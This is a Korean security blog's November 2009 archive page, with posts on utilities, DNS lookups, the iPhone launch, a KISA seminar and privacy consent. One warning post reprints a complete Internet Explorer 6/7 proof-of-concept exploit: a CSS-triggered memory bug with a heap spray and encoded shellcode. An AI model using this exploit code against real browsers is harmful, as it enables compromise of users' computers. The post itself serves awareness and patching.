'2009/11'에 해당되는 글 50건

  1. 2009/11/30 2009년, 나의 구멍난 구두만큼 뛰었다. (1)
  2. 2009/11/30 SSL Strip - 블랙햇 자료
  3. 2009/11/30 하드디스크 불량 점검 검사 툴 (1)
  4. 2009/11/29 압축 프로그램 "빵집" (1)
  5. 2009/11/29 네할렘 프로세서 장착한 서버
  6. 2009/11/28 아이폰 국내 출시일 "아이폰 행사장 생중계" (8)
  7. 2009/11/27 오즈 무한자유정액제로 이젠 네이버 블로깅까지 (8)
  8. 2009/11/27 [초보보안-12강] 각 포털들 네임서버정보 살펴보니 (3)
  9. 2009/11/27 파일,폴더 숨기는 유틸리티 소개합니다. (4)
  10. 2009/11/26 인텔 프로세서 식별 유틸리티
  11. 2009/11/26 사례 중심의 최신 해킹동향 및 대응 기술 세미나 개최
  12. 2009/11/25 IE6.0, IE7.0 제로데이공격 익스플로잇 공개
  13. 2009/11/25 아이폰 SMS & 연락처 리스트 해킹위험 (2)
  14. 2009/11/23 mrtg 설치 문서
  15. 2009/11/23 개인정보 수집, 동의하지 않아도 되는 카드사 (1)
  16. 2009/11/22 '보안인닷컴' 네이버후드 어워드 도전
  17. 2009/11/19 사이버보안관 3000명 인력양성, 백지화 되나? (2)
  18. 2009/11/18 윈도우 2008 라이선스 데이터 쉬트
  19. 2009/11/18 공공기관 정보보호관리체계 (G-ISMS) 의무화 (2)
  20. 2009/11/18 오즈사주카페 -심심풀이 땅콩, 오늘의 운세
  21. 2009/11/16 윈도우 2008 서비스팩 2로 패치하기
  22. 2009/11/16 USB 자주쓰다보니 결국 바이러스 걸리더라 (8)
  23. 2009/11/14 네비에 울고 네비에 웃고-광주출장에서 있었던 에피소드 (5)
  24. 2009/11/14 [강연-12] 전남도 지방공무원 교육원 강의 후기
  25. 2009/11/13 IT 프로를 위한 포켓북 시리즈 (2)
  26. 2009/11/11 Security awareness
  27. 2009/11/11 [칼럼-104] 영업 마인드 & 엔지니어 마인드, 결국은 CEO 마인드 (10)
  28. 2009/11/11 문자와 오즈 메일 서비스의 조화 (2)
  29. 2009/11/11 시큐어넷, 웜,해킹바이러스 통계 활용 안되고 있어 아쉬워
  30. 2009/11/10 [강연-11] 회원제 유통회사에서 개인정보보호에 대한 관리방안 및 보안 사항

2009년, 나의 구멍난 구두만큼 뛰었다.

Life 2009/11/30 19:52



                         구두가 닳아 빗물이 들어 올만큼 난 2009년 한해 열심히 뛰어 다녔다...



'Life' 카테고리의 다른 글

가슴에 와 닿는 동영상 한편-솔개편  (2) 2009/12/26
2009년 아이들 크리스마스 선물  (4) 2009/12/25
2009년, 나의 구멍난 구두만큼 뛰었다.  (1) 2009/11/30
네비에 울고 네비에 웃고-광주출장에서 있었던 에피소드  (5) 2009/11/14
오늘은 My Birthday..  (18) 2009/11/07
안정된 직장 & 자신의 통제감  (0) 2009/11/05
Posted by 엔시스
트랙백 0, 댓글 1개가 달렸습니다.

SSL Strip - 블랙햇 자료

Security Skill&Trend 2009/11/30 09:27



http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

이젠 SSL도 안전하지 않군요...SSL과 HTTPS 프로토콜에 대하여 다시 한번 깊이 있게 연구 해 보아야겠습니다.

 
http://www.leviathansecurity.com/research.html   SSL MITM

http://www.leviathansecurity.com/pdf/Renegotiating_TLS.pdf

http://www.leviathansecurity.com/pdf/ssltlstest.zip



'Security Skill&Trend' 카테고리의 다른 글

웹취약성 OWASP 2010 배포  (2) 2009/12/16
보안공부를 처음 하시는 분들을 위한 조언  (2) 2009/12/12
SSL Strip - 블랙햇 자료  (0) 2009/11/30
IE6.0, IE7.0 제로데이공격 익스플로잇 공개  (0) 2009/11/25
아이폰 SMS & 연락처 리스트 해킹위험  (2) 2009/11/25
USB 자주쓰다보니 결국 바이러스 걸리더라  (8) 2009/11/16
Posted by 엔시스
TAG https, SSL
트랙백 0, 댓글 0개가 달렸습니다.

하드디스크 불량 점검 검사 툴

Security Utility 2009/11/30 09:25

하드디스크 전반적인 검사를 해주는 툴입니다.  용량이 1메가도 되지 않는 아주 가벼운 검색 툴입니다..

하드디스크 베드(bad) 검사나 디스크 정리할때 사용하면 유용하겠습니다..^^


gmhddscanv20.exe


'Security Utility' 카테고리의 다른 글

해쉬 값을 볼수 있는 툴  (2) 2010/01/24
Ping 테스터 유틸리티  (0) 2009/12/16
하드디스크 불량 점검 검사 툴  (1) 2009/11/30
압축 프로그램 "빵집"  (1) 2009/11/29
파일,폴더 숨기는 유틸리티 소개합니다.  (4) 2009/11/27
인텔 프로세서 식별 유틸리티  (0) 2009/11/26
Posted by 엔시스
TAG IT, 불량검사툴, 하드디스크
트랙백 0, 댓글 1개가 달렸습니다.

압축 프로그램 "빵집"

Security Utility 2009/11/29 12:00

프리웨어로 압축 프로그램중에 "빵집"이라는게 있습니다.  일반 공공기관 관공서, 기업체 어디서든 자유롭게 사용할수 있는 압축 프로그램입니다..

늘 무료로 배포해주는 프로그램에 대해서는 감사한 마음이 드네요..잘 쓰겠습니다..

bz3setup.exe


'Security Utility' 카테고리의 다른 글

Ping 테스터 유틸리티  (0) 2009/12/16
하드디스크 불량 점검 검사 툴  (1) 2009/11/30
압축 프로그램 "빵집"  (1) 2009/11/29
파일,폴더 숨기는 유틸리티 소개합니다.  (4) 2009/11/27
인텔 프로세서 식별 유틸리티  (0) 2009/11/26
와이어샤크 윈도우7 지원  (0) 2009/11/06
Posted by 엔시스
TAG IT, 무료, 빵집, 압축프로그램
트랙백 0, 댓글 1개가 달렸습니다.

네할렘 프로세서 장착한 서버

InternetDataCenter 2009/11/29 11:55

최근 쿼드코어(cpu core가 네개)가 아닌 네할램 프로세서가 탑재한 서버들이 이제 시장에 풀리기 시작을 하였다. 물론 더 빨리 풀린 곳도 있겠지만 이제 슬슬 풀리기 시작하였습니다.

또한 네할렘을 소개하는 동영상 도 있으니 참고 바랍니다. 아무튼 일반 사용자가 아닌 서버군에 네할렘 프로세서가 장착된 서버를 접해 보았습니다.

우선 CMOS 바이오스에서부터 살펴 보았습니다.

네할렘 바이오스화면

네할렘은 L3 캐쉬가 있다.



실제 서버에 장착된 모습과 보드를 보면 기존 서버와 크게 차이가 나는게 없습니다.. 아래 서버는 이슬림에서 출시한 서버인데 내부는 다음과 같이 보이고 있네요..



내부구조는 그리 복잡하지 않으며 cpu와 메모리 램 뱅크가 12개로 되어 있고 일반 pc와는 다르게 vga나 사운드카드등이 그리 부각되는 것이 아니라서 조금은 단촐하게 보일수 있습니다.

아직 운영체제 설치를 해 보지 않아서 자세한 내용은 추후에 포스팅 해야겠습니다. 기본적으로 리눅스와 윈도우를 설치해서 어떤 차이점이 있는지 살펴 봐야겠습니다.


'InternetDataCenter' 카테고리의 다른 글

데이터센터의 집결지로 뜨고 있는 부산  (0) 2011/06/29
네할렘 프로세서 장착한 서버  (0) 2009/11/29
IDC 보안 뚫릴 땐 `도미노 피해` 우려  (3) 2008/08/21
스마일서브, 호스팅업계 첫 IDC 가동  (2) 2008/08/11
신축 목동 KT-ICC 홍보 동영상  (0) 2008/07/09
IDC 시장 동향 및 주요 이슈  (0) 2007/12/29
Posted by 엔시스
TAG 네할렘, 리눅스, 서버, 윈도우
트랙백 0, 댓글 0개가 달렸습니다.

아이폰 국내 출시일 "아이폰 행사장 생중계"

IT Trend 2009/11/28 09:44

오늘은 국내 이동통신의 패러다임을 바꾸는 "아이폰 출시일"입니다. 아이폰은 KT를 통하여 오늘 출시되고 있는데 이미 예약 판매를 통하여 약 5만대정도 예약이 되었다고 합니다.

오늘 출시일을 맞이하여 예약자들을 대상으로 하여 300명에게 이벤트와 선물을 증정한다고 하여 많은사람들이 새벽에 줄을 서는 현상을 보이고 있습니다.

이러한 소식은 "올레KT" 트위터를 통하여 "USTREAM" 을 통하여 생중계를 하고 있습니다. 이미 주말 토요일 아침에도 불구하고 약 700명 정도가 방송을 보고 있습니다. 물론 제가 하는 것은 아니고..KT트위터 담당자로 알려지고 있네요..

참 진풍경이 이루어지고 있네요.. 무엇이든 새롭다는 것은 흥미로운 것인가 봅니다.



세상은 점점 편리해 지는 것 같네요...아무튼 국내 "아이폰"이 뭐길래 이렇게...그리고 이렇게 케이블이나 지상파..공중파가 아닌 또다른 개인 사설 방송으로 트위터를 연동하여 긴급 방송은 개인이 소식을 전해 줄수도 있겠습니다.

앞으로는 이제는 새로운 미디어의 등장으로 "방송과 언론"은 정말 긴장을 해야 겠습니다. 현장에서 와이브로로 방송하고있다고 합니다.

 아이폰 출시되는 현장을 실시간으로 방송하는 것을 보고 느낌을 간단히 포스팅을 해 봅니다.  이 방송은 지상파도 케이블도 아닌 그냥 일반개인이 물론 KT 관련 홍보자가 방송하는 것이지만 향후 새로운 물꼬를 트는 방송이 아닐까 생각을 해 봅니다..

향후  많은 변화가 생길 것이라 생각이 듭니다..추이를 계속 지켜보도록 하겠습니다.

'IT Trend' 카테고리의 다른 글

일시적으로 막혀버린 코레일 인터넷 예매 홈페이지  (33) 2010/01/13
네이버 전문정보를 서비스합니다.  (2) 2009/12/20
아이폰 국내 출시일 "아이폰 행사장 생중계"  (8) 2009/11/28
트위터 @boanin 팔로우윙 해 주세요  (0) 2009/11/04
IT관련 교수님들 분발 하셔야겠습니다.  (0) 2009/10/22
블로그에 있어서 최대 단점은 fact (사실)가 없다는 것  (9) 2009/10/05
Posted by 엔시스
TAG IT, 실시간방송, 아이폰, 아이폰출시, 아이폰행사장, 올레 KT, 유스트림
트랙백 2, 댓글 8개가 달렸습니다

오즈 무한자유정액제로 이젠 네이버 블로깅까지

My Hobby/Device Review 2009/11/27 17:11


며칠전에 네이버가 모바일 블로깅을 할수 있도록 지원 된다는 이야기가 있었습니다. 내용을 살펴본다 본다 하다가 마침 어제 한 지인을 만나고 집에 들어 갈때였습니다.

버스를 기다리는데 버스가 오질 않아 휴대폰을 만지작 거리다가 사진을 찍고 바로 네이버 블로그에 올려 보자 라는 생각이 문득 났습니다.

그래서 버스 기다리면서 찍은 사진  바로 롯데 백화점이었습니다. 마침 겨울 분위와 크리스마스 분위기를 내는 듯 하였습니다. 그것을 바로 블로그에 올려 보았습니다.

휴대폰으로 네이버 블로그 접속



어제 올린 블로그 모습



휴대폰으로 네이버 블로그에 접속을 하여 어제 올린 블로그를 보았습니다. 이젠 블로그도 마음대로 외부에서 관리할수 있게 되었습니다. 아마도 이런 현상은 스마트 폰이 대거 출시되면 더욱 가속화  되리라 생각을 합니다..

그럼 어떻게 블로깅 하는지 알려 드리겠습니다.

일반적으로 문자 보내는 것과 같습니다. 다만 받는 전화번호에  #1111  을 적습니다. 이것이 네이버와 LGT가 휴대폰 인증을 받아 연동하는 방법인가 봅니다.

그리고 나서 자신이 포스팅 하고자 하는 문자와 사진을 첨부하여 전송 버튼을 누르기만 하면 끝입니다. 물론 그 사전에 네이버 블로그에서  자신이 올리고자 하는 카테고리를 미리 설정해 줄수 있습니다.

그러면 모바일 블로깅은 항상 그 카테고리에 포스팅이 되게 되는거죠..^^;;





이렇게 포스팅한 것에 대한 댓글을 문자로도 받을수 있습니다.  참 좋은 세상입니다. 꼭 댓글을 알아야 하는 포스팅에서는 알림표시를 잘 하면 외부 활동이 많은 분들에게 아주 유용하게 사용이 되겠지요...

특히 연말 모임같은 것을 블로그에 포스팅하고 참석자는 연락처등 댓글을 달아 놓으라고 하면 굳이 모니터만 쳐다보고 있지 않아도 외부 밖에 일을 하면서도 몇명이 참석 할것인지에 대한 사항도 실시간으로 알수 있을꺼 같습니다.

그 외에도 잘 이용하면 많이 활용이 될듯합니다.




가운데 빨간 테두리 되어진 부분이 어제  버스기다리면서 휴대폰으로 사진을 찍고 추가 부연설명 몇자 쓰고 나서 바로 업로드 한 것입니다..참 세상 많이 좋아졌네요...



오즈 무한자유 데이터 요금제 와 빅3팩 100


이렇게 그동안 휴대폰에서 인터넷이라면 돈 많이 나올까봐 걱정하면서 제대로 사용해 보지 못했던 것을 월 6천원의 오즈 무한자유 데이터 요금제와 빅3팩 100 옵션을 이용하여 문자를 100건 무료 보낼수 있는 부가서비스를 사용하고 있기 때문입니다.

지금까지는 잘 활용하지 못하고 있었는데 블로그 습성(?)은 이러한 부분을 잘 충족 시켜주는 것 같습니다. 앞으로 더욱 데이터 요금제에 관심을 가지게 될듯합니다. 그중에서 가장 저렴한 오즈 무한자유로 인터넷을 맘껏 즐길수 있네요..

보통, 한달에 저의 경우는 문자도 그리 많이 보내는 편도 아니고 인터넷도 그리 많이 쓰는 편이 아니라서 한달씩 써 보니까 주어진 무료 사용량에 턱없이 모자라네요.. 더 열심히 콘텐츠 소비를 좀 해야 겠습니다.  오즈에서도 더 많은 풍부한 콘텐츠 제공을 해 주시길 바라겠습니다...

'My Hobby > Device Review' 카테고리의 다른 글

엠피온 "스마트T" SET-130 하이패스 단말기  (2) 2009/12/12
10년된 혼수품 TV, XCANVAS로 바꾸다  (2) 2009/12/05
오즈 무한자유정액제로 이젠 네이버 블로깅까지  (8) 2009/11/27
오즈사주카페 -심심풀이 땅콩, 오늘의 운세  (0) 2009/11/18
문자와 오즈 메일 서비스의 조화  (2) 2009/11/11
아레나, 오즈에서 지식 서비스를  (1) 2009/10/26
Posted by 엔시스
TAG IT, 네이버 모바일 블로깅, 모블로깅, 오즈, 오즈무한자유, 전주현
트랙백 0, 댓글 8개가 달렸습니다

[초보보안-12강] 각 포털들 네임서버정보 살펴보니

Security Beginner 2009/11/27 11:18

도메인네임서비스(DNS)라는 것은 IP정보를 기억하기 쉽게 네임밍으로 전환해 주는 서비스를 말합니다. 수 많은 IP를 기억하지 못하니까 이름 즉, 네이밍으로 기억하면 쉽다는 것이겠죠.

일반적으로 인터넷 사이트가 접속이 안되는 경우가 있습니다. 그럴때 서버쪽 문제인지 클라이언트 문제인지를 파악하기 위하여 서버측 네임서비스를 확인해 볼 필요가 있습니다.

그 네임서버가 장애가 생기거나 다운 되었을 경우에 또는 DDoS공격을 받는다고 한다면 내가 접속 하고자 하는 사이트를 브라우져에서 접속을 할수 없겠지요.

그럼 하나씩 살펴 보겠습니다.

1)  [실행] 에서 'CMD' 라고 타이핑을 합니다.



2.)  [nslookup] 이라고 타이핑을 하고 엔터를 칩니다.



3.)  네이버 도메인네임서비스 정보를 알아 보겠습니다.

     set type=ns
      naver.com

이라고 타이핑합니다.  그러면 현재 네이버에서 사용하고 있는 네임서비스 정보가 보여집니다.



4) www.naver.com 이라고 타이핑을 치면 네임서비스에서 또 다른 정보 TTL 값도 보여주고 있습니다. 현재 설정된 값으로 보아 네이버는 300초 즉, 5분으로 설정이 되어 있습니다.


5. 다음도 한번 살펴 보았습니다.



다음에선 네임서비스 레코드값 세부 설정 쿼리를 막아 놓았네요.. 조금 보안에 더 신경을 쓰는 것 같습니다.


처음엔 네이버만 검색해 보려고 했는데 다음까지 하다보니 이제 나머지 몇몇 국내 포털 도메인 네임서비스 정보를 한번 살펴 보겠습니다.

이것은 불법적으로 하는 것이 아닌 누구나 자신의 pc에서 네임서비스에 대한 정보를 검색 가능함으로 가능할수 있습니다.

6. 야후를 검색해 보았습니다.



역시 해당 정보를 알수 있는데 기본 TTL 값은 30분으로 설정이 되어 있군요..

7. 네이트를 검색해 보았습니다.



네이트 역시 네임서버 세부 레코드 값을 보여주지 않고 있습니다..

8. 파란을 검색해 보았습니다.


파란역시 네임서버 세부 레코드 값을 보여 주고 있었는데 기본 TTL값은 1분으로 설정이 되어 있었습니다.


마무리글

우리가 흔히 사용하는 도메인네임서비스, 각각의 IP를 사용자가 네이밍으로 쉽게 사용할수 있게끔 해 주는 서비스인 네임서비스가 자칫 잘못하다간 보안위협에 노출될 위험이 많습니다.

따라서, 정보제공은 최소한에 정보로 제공이 되어야 하고 네임서버 레코드 값을 보여주는 것은 위험할수도 있습니다. 이것을 보안 측면에서  볼때 [네이트][다음]의 승리라 볼수 있겠습니다.

늘, 보안과 정보보호는 안전하게 사전에 예방하고 틈틈히 살펴 보는 자세가 중요하겠습니다. 특히 네임서버를 통하여 DDoS 공격시에는 상당히 취약해 질수도 있는 영역이기도 합니다. 관련 업체 담당자들은 조금 더 신경을 써야 하겠습니다..@엔시스.


'Security Beginner' 카테고리의 다른 글

[초보보안-14강] 함부로 다운로드 받아 설치하지 말자.  (9) 2010/04/03
[초보보안-13강] DHCP 프로토콜이란?  (5) 2010/01/02
[초보보안-12강] 각 포털들 네임서버정보 살펴보니  (3) 2009/11/27
[초보보안-11강] 좀비 PC탈출 노하우 베스트 5  (1) 2009/08/11
[초보보안-10강] 네트워크 경로 알아보기 -Tracert  (2) 2009/06/19
[초보보안-9강] 내 PC IP주소 확인하기 - ipconfig  (3) 2009/06/18
Posted by 엔시스
TAG IT, 네임서버, 네임서버 레코드값, 네임서비스
트랙백 0, 댓글 3개가 달렸습니다

파일,폴더 숨기는 유틸리티 소개합니다.

Security Utility 2009/11/27 09:59

흔히 우리가 pc를 아무리 잘 관리 한다고 하여도 웜이나 바이러스에 노출 될수 있습니다. 이럴경우 이중 삼중으로 안전을 도모 해야 합니다.

이럴때 파일이나 폴더를 불법 접근으로부터 안전하게 보호 한다면 조금 더 안심이 되겠지요. 그러한 기능을 하는 유틸리티가 있어 소개 합니다.

상당히 가벼우면서도 파일과 폴더를 숨기기도 하고 엑세스를 못하게 할수도 있습니다. 중요한 데이터를 사용하시는 분들은 참고 하여 사용하시면 좋겠습니다.


프로그램 이름은 이지파일락커 입니다. 검색하여 찾아 보았더니 제법 많이 사용하고 있더군요...현재까지 프리웨어로 무료로 사용 가능 할수 있으니 그것 또 한 매력적이겠죠..





EFL1.2_Setup.exe


## 설치하는 방법

1. 더블클릭하여 일반적인 설치를 합니다.
2. 위에 첫번째 + 표시는 파일이고 두번째 + 표시는 폴더입니다.
3. 해당 잠김을 하고 싶은 + 표시를 클릭을 하면 path 경로가 나옵니다. 오른쪽에 .... 모양의 버튼을 눌러 그냥 클릭만 해주면
   됩니다.

4. 그 다음 [System] 에서 [set password ] 클릭하여 자신만이 알고 있는 패스워드를 설정 하면 되겠죠.

보다 안전한 파일관리와 폴더 관리를 하시기 바랍니다...



'Security Utility' 카테고리의 다른 글

하드디스크 불량 점검 검사 툴  (1) 2009/11/30
압축 프로그램 "빵집"  (1) 2009/11/29
파일,폴더 숨기는 유틸리티 소개합니다.  (4) 2009/11/27
인텔 프로세서 식별 유틸리티  (0) 2009/11/26
와이어샤크 윈도우7 지원  (0) 2009/11/06
와이어샤크 방화벽 ACL 룰 추가  (0) 2009/11/04
Posted by 엔시스
TAG 파일 숨김, 폴더 숨김
트랙백 0, 댓글 4개가 달렸습니다

인텔 프로세서 식별 유틸리티

Security Utility 2009/11/26 16:07

인텔 프로세서에 대한 식별 유틸리티입니다.  프로세스를 어떤 것을 또는 어떤 내용을 지원하는지에 대한 상세한 레포팅이 가능한 유틸리티입니다..



http://downloadcenter.intel.com/Detail_Desc.aspx?ProductID=1881&DwnldID=7838&lang=kor




'Security Utility' 카테고리의 다른 글

압축 프로그램 "빵집"  (1) 2009/11/29
파일,폴더 숨기는 유틸리티 소개합니다.  (4) 2009/11/27
인텔 프로세서 식별 유틸리티  (0) 2009/11/26
와이어샤크 윈도우7 지원  (0) 2009/11/06
와이어샤크 방화벽 ACL 룰 추가  (0) 2009/11/04
패킷 제너레이터 툴 - HYENE  (6) 2009/08/06
Posted by 엔시스
트랙백 0, 댓글 0개가 달렸습니다.

사례 중심의 최신 해킹동향 및 대응 기술 세미나 개최

Seminar&Association 2009/11/26 15:18

지방에서는 잘 없는 정보보호관련 세미나죠..^^

부산인근에 있는 보안에 관심 있는 분들은 많은 참여를 하시면 좋겠네요...


=================================================================================================================

사례 중심의 최신 해킹동향 및 대응 기술 세미나에 여러분을 초대합니다.

본 세미나는 정보보호 실무자를 대상으로 침해사고의 주요 트렌드와 빈번히 발생하고 있는 사고 대응 실무 세미나를 통해 보안담당자의 대응 능력 강화하고자 「사례 중심의 최신 해킹동향 및 대응 기술 세미나」를 개최하오니 관심있는 분들의 많은 참여를 부탁드립니다.

세미나 정보

  • 세미나명 : 「사례 중심의 최신 해킹동향 및 대응 기술 세미나」
  • 일 시 : 2009년 12월 2일(수), 12:30 ~ 17:30
  • 장 소 : 부산 Bexco 컨벤션홀 APEC(205호)
  • 참석대상자 : 일반 기업/대학 등의 시스템 관리자 및 보안 담당자, 학생 등
  • 참가비 : 무료
  • 세미나 프로그램
    시 간 내  용 발표자
    12:30~12:50 등록 및 세미나 자료 배포, 행사안내
    12:50~13:00 인사말 KISA 김희정 원장
    13:00~13:40 홈페이지 해킹 및 DDoS 현황과 대응 KISA 최중섭 팀장
    13:40~14:20 무선 네트워크 보안 보안연구회 HSD 김길중
    14:20~15:00 윈도우 피해시스템 분석 방법 KISA 주필환 주임연구원
    15:00~15:15 Coffee Break
    15:15~15:55 Windows 7 개발자 보안과 호환성 MS 강성재 차장
    15:55~16:35 악성봇 기술 발전 및 대응 KISA 전은국 주임연구원
    16:35~17:15 AD와 SMS를 이용한 사내 보안통제 (주)코스콤 금융ISAC
    김두현 책임컨설턴트
    17:15~17:30 행사 정리
    ※ 프로그램 내용이나 발표자는 변경될 수 있습니다

    • 세미나 사전신청


    ※ 세미나 등록비용은 무료입니다.
    ※ 행사장의 좌석과 자료집이 한정되어 있는 관계로 사전등록자 우선으로 참석가능합니다.
    ※ 주차는 참가자 부담이오니 가급적 대중교통을 이용해 주시기 바랍니다.

    찾아오시는 길

    약도

    - 지하철 노선 : 2호선 센텀시티 역 1번출구
    - 버스노선 안내: http://www.bexco.co.kr/korean/location/location_traffic_03.jsp
    ※ 주차는 참가자 부담이오니 가급적 대중교통을 이용해주시기 바랍니다.

    문의 : KISA 전은국 연구원 (405-5635, ekchun@kisa.or.kr)


'Seminar&Association' 카테고리의 다른 글

한국CISSP협회 제6회 정보보호세미나 후기  (4) 2010/03/02
보안인닷컴 부산정모 및 송년모임 스케치  (0) 2009/12/22
사례 중심의 최신 해킹동향 및 대응 기술 세미나 개최  (0) 2009/11/26
지식정보보안 신규일자리 창출사업 참여기업 모집 안내  (2) 2009/10/26
클라우딩 컴퓨팅 2009  (0) 2009/10/07
한국CISSP협회, 제4회 정보보호리더십 세미나 개최  (0) 2009/09/23
Posted by 엔시스
트랙백 0, 댓글 0개가 달렸습니다.

IE6.0, IE7.0 제로데이공격 익스플로잇 공개

Security Skill&Trend 2009/11/25 08:48

시큐리티포커스에 올라온 버그트랙에 보면 IE7.0 취약서을 이용한 공격 익스플로잇 소스가 공개 되었습니다. 사용자 주의가 요망됩니다.

http://www.securityfocus.com/archive/1/507984/30/0/threaded


<!--
securitylab.ir
K4mr4n_st (at) yahoo (dot) com [email concealed]
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML xmlns="http://www.w3.org/1999/xhtml">
<HEAD>
<script>
function load(){
var e;
e=document.getElementsByTagName("STYLE")[0];
e.outerHTML="1";
}
</script>
<STYLE type="text/css">
body{ overflow: scroll; margin: 0; }
</style>

<SCRIPT language="javascript">
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u
0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u
543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u
89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u
0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u
7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<4000; x++) memory[x] = block + shellcode;
</script>

</HEAD>
<BODY onload="load()">
</BODY>
</HTML>



알려진 바로는  Microsoft HTML viewer (mshtml.dll)  와 internal style sheet  (CSS/STYLE) object via document.getElementsByTagName() method  를 공격하는 것으로 나타났다. (관련글 링크 : 여기)        


http://seclists.org/bugtraq/2009/Nov/148  에도 링크가 되어 있는데 백신에서 바로 감지하네요..


익스플로러 취약성 공격코드




MS 다음패치일인 12월8일에 패치 될것으로 생각되고 있고 IE8.0 에서는 이러한 취약점이 발견되지 않은 것으로 알려지고 있다.  빠른 시일내에 업그레이드를 해야만 하겠다. 참고 바랍니다.

지금 바로 IE8.0 으로 업그레이드 하시기 바랍니다.


'Security Skill&Trend' 카테고리의 다른 글

보안공부를 처음 하시는 분들을 위한 조언  (2) 2009/12/12
SSL Strip - 블랙햇 자료  (0) 2009/11/30
IE6.0, IE7.0 제로데이공격 익스플로잇 공개  (0) 2009/11/25
아이폰 SMS & 연락처 리스트 해킹위험  (2) 2009/11/25
USB 자주쓰다보니 결국 바이러스 걸리더라  (8) 2009/11/16
대한민국 아직도 스팸 상위국가 -소포스 시큐리티 레포트  (4) 2009/11/10
Posted by 엔시스
TAG IE8.0, IT, 제로데이 공격
트랙백 1, 댓글 0개가 달렸습니다.

아이폰 SMS & 연락처 리스트 해킹위험

Security Skill&Trend 2009/11/25 06:03

역시 안전한 곳이 없군요...국내 막 풀리기 시작한 아이폰.

보안에도 각별히 신경을 써야 하겠습니다.....이미 아이폰 사용자를 대상으로 하여 해킹하는 소스 코드가 인터넷에서 공개가 되었습니다.

일명 " 아이폰정보도둑" 정도로 해석이 되겠는데.




늘 보안의식을 가지고 100% 안전한 곳은 없다라는 인식이 중요하겠습니다. 특히 무선이 가능하기 때문에 이제는 유선보다 보안이 취약하면 더 겉 잡을수 없는 보안위협과 정보 유출이 되었을때 파급효과가 미칠것입니다. 효율성과 보안은 양날의 검인듯 싶네요..



'Security Skill&Trend' 카테고리의 다른 글

SSL Strip - 블랙햇 자료  (0) 2009/11/30
IE6.0, IE7.0 제로데이공격 익스플로잇 공개  (0) 2009/11/25
아이폰 SMS & 연락처 리스트 해킹위험  (2) 2009/11/25
USB 자주쓰다보니 결국 바이러스 걸리더라  (8) 2009/11/16
대한민국 아직도 스팸 상위국가 -소포스 시큐리티 레포트  (4) 2009/11/10
AES 암호알고리즘 카툰  (0) 2009/11/09
Posted by 엔시스
TAG IT, 보안, 아이폰, 해킹
트랙백 2, 댓글 2개가 달렸습니다

mrtg 설치 문서

Operating System/Linux 2009/11/23 16:25

mrtg 설치 문서
mrtg-jaehoon.pdf

'Operating System > Linux' 카테고리의 다른 글

ProFTPD 서버, 해킹 공격 당해 일부 파일 백도어 포함되어  (0) 2010/12/04
mysql root 패스워스 분실시 복구하는 방법  (0) 2010/04/15
mrtg 설치 문서  (0) 2009/11/23
VMWARE에서 올바른 운영체제 선택은?  (9) 2009/09/16
리눅스 이젠 네트워크로 설치 하세요.  (7) 2009/06/04
리눅스 파일 시스템 에러, 어떻게 복구 할까?  (1) 2009/01/30
Posted by 엔시스
트랙백 0, 댓글 0개가 달렸습니다.

개인정보 수집, 동의하지 않아도 되는 카드사

Privacy Security 2009/11/23 09:05

가끔 외부 일정이 있을땐 또는 명절이나 연말이 될때 우리는 카드를 많이 사용하게 됩니다. 그러다 보니 어느덧 얼마나 사용했는지에 대한 사용금액이 궁금할때가 있습니다.

그럴땐 해당 카드사 웹에 접속하여 이달에 청구된 청구 금액이나 또는 실시간 카드 결제 내역을 보시면 도움이 됩니다. 오랜만에 접속한 국내 모 카드사 웹페이지.


첫 화면에 띄우는 개인정보 수집 동의 안내문구,.,

개인정보 수집 동의화면



우리는 지금껏 [개인정보 수집 동의]  체크 버튼에 클릭을 하지 않으면 그 다음 화면으로 넘어 가지 않았습니다. 필자는 반신반의하다가 [동의하지 않음]에 한번 체크를 해 보고 클릭을 해 보았습니다.

바로 다음 화면으로 넘어가더군요..

역시 고객 입장에서 생각하는 마인드에 칭찬을 주고 싶습니다. 잘한것은 잘했다라고 칭찬을 해야 합니다. 몸소 개인정보수집 실천을 제대로 하고 있는 기업이라 생각이 듭니다.

그것은 반 강제적인 개인정보 수집으로 [동의한다]에 체크를 하지 않으면, 또는 나는 개인정보 수집에 동의 하고 싶지 않는 사람도 있을 것입니다. 이것을 기업입장에서 본 것이 아닌 소비자(고객)입장에서 본 것입니다.


지금 테스트는 기존에 제가 가입되어 있던 것으로, 추가 개인정보 수집에 동의 하지 않아도 된다는 형태로 하여 넘어갔는지도 모르겠습니다.

따라서 초기 최초 회원 가입시에도 개인정보수집에 [동의하지 않음] 에 체크를 하고 다음화면으로 넘어간다면 제대로 고객 입장에서 몸소 실천하는 기업입니다. 기업의 욕심을 버린것입니다.

오히려, 이런 기업이라면 남들 다 강제로 개인정보 수집하려고 기업입장으로 생각하는데 사용자 입장을 고려하여 생각하는 마음은 높이 살만 합니다.

혹시 이글 읽으시고 최초 회원 가입시에도 [개인정보동의 안함]에 체크 하였는데도 다음 화면으로 넘어간다면 댓글로 제보 부탁드립니다.

해당 카드사는 "부자되세요~~"라고 카피라이터로 유명한 곳이죠..

'Privacy Security' 카테고리의 다른 글

주민번호 이젠 의무적으로 암호화 해야  (4) 2010/01/31
아이핀(i-pin) 으로 전환하고 상품도 타고  (0) 2009/12/10
개인정보 수집, 동의하지 않아도 되는 카드사  (1) 2009/11/23
개인정보보호 기술적.관리적 보호조치 기준 해설서  (0) 2009/09/18
개인정보보호 기술적,관리적 보호조치 기준은?  (2) 2009/06/15
